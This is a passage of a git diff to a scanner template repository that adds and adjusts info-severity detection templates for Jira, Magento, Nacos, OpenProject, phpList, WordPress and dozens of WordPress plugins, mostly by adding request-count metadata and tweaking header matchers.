+1,20 @@ id: jira-detect info: - name: Jira Login Panel - Detect - author: pdteam,philippedelteil + name: Jira Detect + author: pdteam,philippedelteil,AdamCrosser severity: info description: Jira login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: panel,jira + tags: tech,panel,jira,atlassian metadata: max-request: 3 + vendor: atlassian + product: jira + category: productivity http: - method: GET @@ -34,5 +37,3 @@ http: group: 1 regex: - 'title="JiraVersion" value="([0-9.]+)' - -# Enhanced by md on 2022/11/21 diff --git a/http/technologies/magento-detect.yaml b/http/technologies/magento-detect.yaml index bf32690dde..dedb6cce3b 100644 --- a/http/technologies/magento-detect.yaml +++ b/http/technologies/magento-detect.yaml @@ -26,7 +26,7 @@ http: matchers: - type: dsl dsl: - - 'contains(tolower(all_headers), "x-magento")' + - 'contains(tolower(header), "x-magento")' - 'status_code == 200' condition: and diff --git a/http/technologies/magento-eol.yaml b/http/technologies/magento-eol.yaml new file mode 100644 index 0000000000..b274c42e82 --- /dev/null +++ b/http/technologies/magento-eol.yaml @@ -0,0 +1,42 @@ +id: eol-magento + +info: + name: Magento End-of-life Detect + author: dogancanbakir + severity: info + description: | + Magento end of life detection. + reference: + - https://www.magento.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 1 + shodan-query: http.component:"Magento" + verified: true + tags: magento,tech,cms + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + internal: true + name: version + group: 1 + regex: + - 'Magento\/([0-9.]+) ' + + matchers: + - type: dsl + dsl: + - compare_versions(version, '<=2.4') + + - type: regex + part: body + regex: + - 'Magento\/([0-9.]+) ' diff --git a/http/technologies/magento-version-detect.yaml b/http/technologies/magento-version-detect.yaml new file mode 100644 index 0000000000..ca111f51b8 --- /dev/null +++ b/http/technologies/magento-version-detect.yaml @@ -0,0 +1,86 @@ +id: magento-version-detect + +info: + name: Magento Version Detect + author: sullo,dogancanbakir + severity: info + description: | + Magento version detection via version module and copyright text. + reference: + - https://www.magento.com/ + - https://magento.stackexchange.com/a/62966 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 2 + shodan-query: http.component:"Magento" + verified: "true" + tags: tech,magento,cms + +http: + - raw: + - | + GET /magento_version HTTP/1.1 + Host: {{Hostname}} + + - | + GET /skin/frontend/default/default/css/styles.css HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: or + matchers: + + - type: regex + regex: + - '^Magento/.*$' + + - type: word + name: magento-1.9 + words: + - "Copyright (c) 2014 Magento Inc." + + - type: word + name: magento-1.8 + words: + - "Copyright (c) 2013 Magento Inc." + + - type: word + name: magento-1.7 + words: + - "Copyright (c) 2012 Magento Inc." + + - type: word + name: magento-1.6 + words: + - "Copyright (c) 2011 Magento Inc." + + - type: word + name: magento-1.4.1-1.5 + words: + - "Copyright (c) 2010 Magento Inc." + + - type: word + name: magento-1.4.0 + words: + - "Copyright (c) 2009 Irubin Consulting Inc." + + - type: word + name: magento-1.0-1.3 + words: + - "Copyright (c) 2008 Irubin Consulting Inc." + + extractors: + - type: regex + part: body + regex: + - "Magento.*$" + + - type: regex + part: body + group: 1 + name: version + regex: + - 'Magento\/([0-9.]+) ' + +# Enhanced by dcb 2022/11/29 diff --git a/http/technologies/nacos-version.yaml b/http/technologies/nacos-version.yaml index 57967f7e0a..71866f9bfb 100644 --- a/http/technologies/nacos-version.yaml +++ b/http/technologies/nacos-version.yaml @@ -8,24 +8,29 @@ info: Nacos was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 1 - verified: true + max-request: 2 shodan-query: title:"Nacos" + verified: true tags: tech,detect,nacos http: - method: GET path: - "{{BaseURL}}/v1/console/server/state?accessToken=&username=" + - "{{BaseURL}}/nacos/v1/console/server/state?accessToken=&username=" + matchers-condition: and matchers: - type: regex regex: - '"version":"(\d+\.\d+\.\d+)"' + - type: status + status: + - 200 + extractors: - type: regex part: body diff --git a/http/technologies/openethereum-server-detect.yaml b/http/technologies/openethereum-server-detect.yaml index 20c618100e..2cb8182ad6 100644 --- a/http/technologies/openethereum-server-detect.yaml +++ b/http/technologies/openethereum-server-detect.yaml @@ -28,7 +28,7 @@ http: - type: dsl dsl: - 'status_code == 200' - - 'contains(all_headers, "application/json")' + - 'contains(header, "application/json")' - 'contains(body, "OpenEthereum")' condition: and diff --git a/http/technologies/openproject-detect.yaml b/http/technologies/openproject-detect.yaml new file mode 100644 index 0000000000..7be02ed3e3 --- /dev/null +++ b/http/technologies/openproject-detect.yaml @@ -0,0 +1,41 @@ +id: openproject-detect + +info: + name: OpenProject - Detect + author: ricardomaia + severity: info + description: OpenProject is an open source web-based project management software. + reference: + - https://www.openproject.org/ + metadata: + max-request: 3 + verified: "true" + shodan-query: title:"openproject" + tags: tech,openproject,api,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/api/v3" + - "{{BaseURL}}/activity.atom" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: regex + regex: + - '.*OpenProject.Foundation.\(OPF\)' + - "" + condition: or + + - type: word + words: + - "OpenProject" + - "instanceName" + condition: and + + - type: word + part: header + words: + - "_open_project_session" diff --git a/http/technologies/phplist-detect.yaml b/http/technologies/phplist-detect.yaml new file mode 100644 index 0000000000..d4d361afa0 --- /dev/null +++ b/http/technologies/phplist-detect.yaml @@ -0,0 +1,40 @@ +id: phplist-detect + +info: + name: phpList - Detect + author: ricardomaia + severity: info + description: | + phpList is an open source newsletter manager. + reference: + - https://www.phplist.org/ + metadata: + max-request: 1 + shodan-query: html:"phplist" + verified: true + tags: tech,phplist,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers: + - type: word + part: body + words: + - 'content="phpList' + - 'phpList Ltd' + - 'phpList' + condition: or + case-insensitive: true + + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)version.((\d\.?)+)' diff --git a/http/technologies/spinnaker-detect.yaml b/http/technologies/spinnaker-detect.yaml index c9707c81c4..46b2938940 100644 --- a/http/technologies/spinnaker-detect.yaml +++ b/http/technologies/spinnaker-detect.yaml @@ -23,4 +23,4 @@ http: - type: dsl dsl: - - "contains(tolower(all_headers), 'x-spinnaker-priority')" \ No newline at end of file + - "contains(tolower(header), 'x-spinnaker-priority')" \ No newline at end of file diff --git a/http/technologies/versa/versa-networks-detect.yaml b/http/technologies/versa/versa-networks-detect.yaml index 50b3e94392..4f01828145 100644 --- a/http/technologies/versa/versa-networks-detect.yaml +++ b/http/technologies/versa/versa-networks-detect.yaml @@ -10,7 +10,7 @@ info: max-request: 7 verified: true shodan-query: html:"Versa Networks" - tags: tech,versa,network + tags: tech,versa http: - method: GET diff --git a/http/technologies/wordpress-detect.yaml b/http/technologies/wordpress-detect.yaml index 7e0d692b9b..8f881fac5c 100644 --- a/http/technologies/wordpress-detect.yaml +++ b/http/technologies/wordpress-detect.yaml @@ -2,12 +2,15 @@ id: wordpress-detect info: name: WordPress Detect - author: pdteam,daffainfo,ricardomaia,topscoder + author: pdteam,daffainfo,ricardomaia,topscoder,AdamCrosser severity: info metadata: max-request: 4 verified: true shodan-query: http.component:"WordPress" + vendor: wordpress + product: wordpress + category: cms tags: tech,wordpress,cms,wp http: diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml new file mode 100644 index 0000000000..68767e4dce --- /dev/null +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -0,0 +1,50 @@ +id: wordpress-breeze + +info: + name: Breeze – WordPress Cache Plugin Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/breeze/ + metadata: + max-request: 1 + plugin_namespace: breeze + wpscan: https://wpscan.com/plugin/breeze + tags: tech,wordpress,wp-plugin,top-200 + +http: + - method: GET + + path: + - "{{BaseURL}}/wp-content/plugins/breeze/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/breeze.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index e555bf93d3..425adf0bfe 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: + max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 814e603d75..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -1,12 +1,13 @@ id: wordpress-custom-fonts info: - name: Custom Fonts Detection + name: Custom Fonts – Host Your Fonts Locally Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - 